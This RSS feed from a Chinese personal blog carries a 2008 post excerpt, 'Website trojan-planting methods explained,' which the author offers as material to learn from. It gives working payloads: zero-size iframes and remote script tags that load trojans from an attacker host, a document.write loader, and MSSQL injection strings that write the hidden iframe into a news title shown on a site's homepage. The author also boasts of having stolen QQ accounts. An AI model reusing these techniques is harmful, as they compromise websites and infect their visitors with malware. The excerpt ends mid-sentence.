<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>戴亮网站挂马</title>
	<atom:link href="http://www.dailiang.com/tag/%e7%bd%91%e7%ab%99%e6%8c%82%e9%a9%ac/feed" rel="self" type="application/rss+xml" />
	<link>http://www.dailiang.com</link>
	<description>尘归尘,土归土!勇敢做第一个自己,自尊自爱!</description>
	<lastBuildDate>Fri, 03 Feb 2012 06:45:45 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>网站挂马方式详解</title>
		<link>http://www.dailiang.com/2008/11/web-site-linked-to-the-way-ma-detailed.html</link>
		<comments>http://www.dailiang.com/2008/11/web-site-linked-to-the-way-ma-detailed.html#comments</comments>
		<pubDate>Fri, 28 Nov 2008 15:07:57 +0000</pubDate>
		<dc:creator>戴亮</dc:creator>
				<category><![CDATA[分享资源]]></category>
		<category><![CDATA[手机专题]]></category>
		<category><![CDATA[网站挂马]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://dliang.sinaapp.com//?p=403</guid>
		<description><![CDATA[记得前几天我经常去的网站和论坛都被挂马了，特别郁闷，然后觉得网络上人才真的太多了，什么样的人都有啊，人才，人才，学习把，这个是老文章了，2006年的文章了，慢慢看，慢慢学！ 突然觉得黑客是一个很牛B的行业，还记得我高中的还研究过这个玩意，我还几个6位非会无保的QQ号都是这么来的，呵呵，后来，上了大学了，这个玩意儿就不干了，没意思，也觉得，杀毒软件日益更新，那个都是小打小闹了，搞服务器挂马，我觉得才是王道啊&#8230;. 先说一说，得到webshell的挂马方法 一般的挂马的都是用框架，这是最基本的挂马方式，只要不破坏原有的语言逻辑，那就想插入哪里就写哪里了，最基本的语句当然是&#60;iframe src=http://www.fucksb.net/mm.htm width=0 height=0&#62;&#60;/iframe&#62;，其中http://www.fucksb.net/mm.htm是我们的木马，下面就不一个一个提示了。 上面可能是一般的挂马方式，也是初学者的玩法，好了，再说深一点点的，那就是js文件，好多网站上，你查看源代码都会调用js文件，其中的语句为&#60;script language=javascript src=./ad/ad.js&#62;&#60;/script&#62;，想到了什么，这里也可以挂马，其中我们可以远程调用自己的js，比如:&#60;script language=javascript src=http://www.fucksb.net/mm.js&#62;&#60;/script&#62;这个mm.js就可以写木马了，怎么写呢，同样，我们还用最基本的iframe框架，不过在&#60;script&#62;&#60;/script&#62;之中可识别语言不是html，那怎么办呢，follow me,js文件可以这样写:document.write(“&#60;iframe &#60;iframe src=http://www.fucksb.net/mm.htm width=0 height=0&#62;&#60;/iframe&#62;”);，这种形势，这时就可以执行此js中的代码了，当然了，说白了，其实全语句就是&#60;script language=javascript&#62;document.write(“&#60;iframe &#60;iframe src=http://www.fucksb.net/mm.htm width=0 height=0&#62;&#60;/iframe&#62;”)&#60;/script&#62;呵呵。。 聪明的你可能发现了一点，好像不止是js文件哦~，只要在&#60;script&#62;&#60;/script&#62;之中，无论什么后缀的文件，只要里面写的语句可以被javascript识别就会执行，对的，比如&#60;script src=http://www.fucksb.net/mm.test&#62;&#60;/script&#62;，又如&#60;script src=http://www.fucksb.net/mm.lala&#62;&#60;/script&#62;管他的后缀是什么，只要里面写的语句正确就会被执行了。 同样，如果首页调用其它网站，或者次级目录中的htm,asp等如:&#60;iframe src=./ad/news.htm width=300 height=200&#62;&#60;/iframe&#62; 也可以在news.htm文件里挂马，可以是htm和js，随便哪种，这是比较隐蔽的玩法，这些适用于主页没有写权限的方法。 &#60;script&#62;同&#60;iframe&#62;2个相比较，好处是script整体挂马的代码长度比iframe小得多，很实用。说实用是在数据库方面，下面介绍。 数据库挂马，这里我们拿mssql数据库为例子。 这里说的是首页调用到的数据库，比如新闻，论坛，公告，等等，一般是标题。这些需要经验去检测，举个例子，比如首页有一条新闻为：“明日开业”，那么鼠标点此新闻，地址栏打开的新窗口为news.asp?id=1，这种情况，这时，就可以判断此新闻是从数据库中调用的了，当然了，我们不说access，只说mssql。 首页，我们要有这个网站中的一个注入点，比如就点在vote.asp?id=123，同时，至少是Db_owner权限，这时如果要挂马可以不用取到webshell，因为如果我们的目的只在于挂马的话，而且有时，还得检测mssql数据库和web服务器不在同一个机器上，那挂马的方式就是更改数据库内容，这里我说的就是这种，如上面说的，首页显示的一条新闻标题为“明日开业”，如果首页显示的标题是“明日开业&#60;/a&#62;&#60;iframe src=http://www.fucksb.net/mm.htm width=0 height=0&#62;&#60;/iframe&#62;”，那这样的话，首页就会执行这段代码了，像这种情况，找到了注入点，就得找表名，如此新闻的表名为news，字段为title，id,等等，根据猜测,id=1时，暴出的字段title的值就为“明日开业”，那么90%就可以猜到了，首页调用的数据库的字段就为news表中的title，这时在注入点，可以大胆提交vote.asp?id=123;update news set title=&#8217;明日开业&#60;/a&#62;&#60;iframe src=http://www.fucksb.net/mm.htm width=0 height=0&#62;&#60;/iframe&#62;&#8217; where id=1;&#8211;，这样就可以更改数据库了，前提是最少要少db_owner权限，当然也有时由于代码原因，也可以这样提交:vote.asp?id=123&#8242;;update news set title=&#8217;明日开业&#60;/a&#62;&#60;ifrmae src=http://www.fucksb.net/mm.htm width=0 height=0&#62;&#60;/iframe&#62;&#8217; where id=1 and &#8217;1&#8242;=&#8217;1，也可以&#8230; [...]]]></description>
		<wfw:commentRss>http://www.dailiang.com/2008/11/web-site-linked-to-the-way-ma-detailed.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

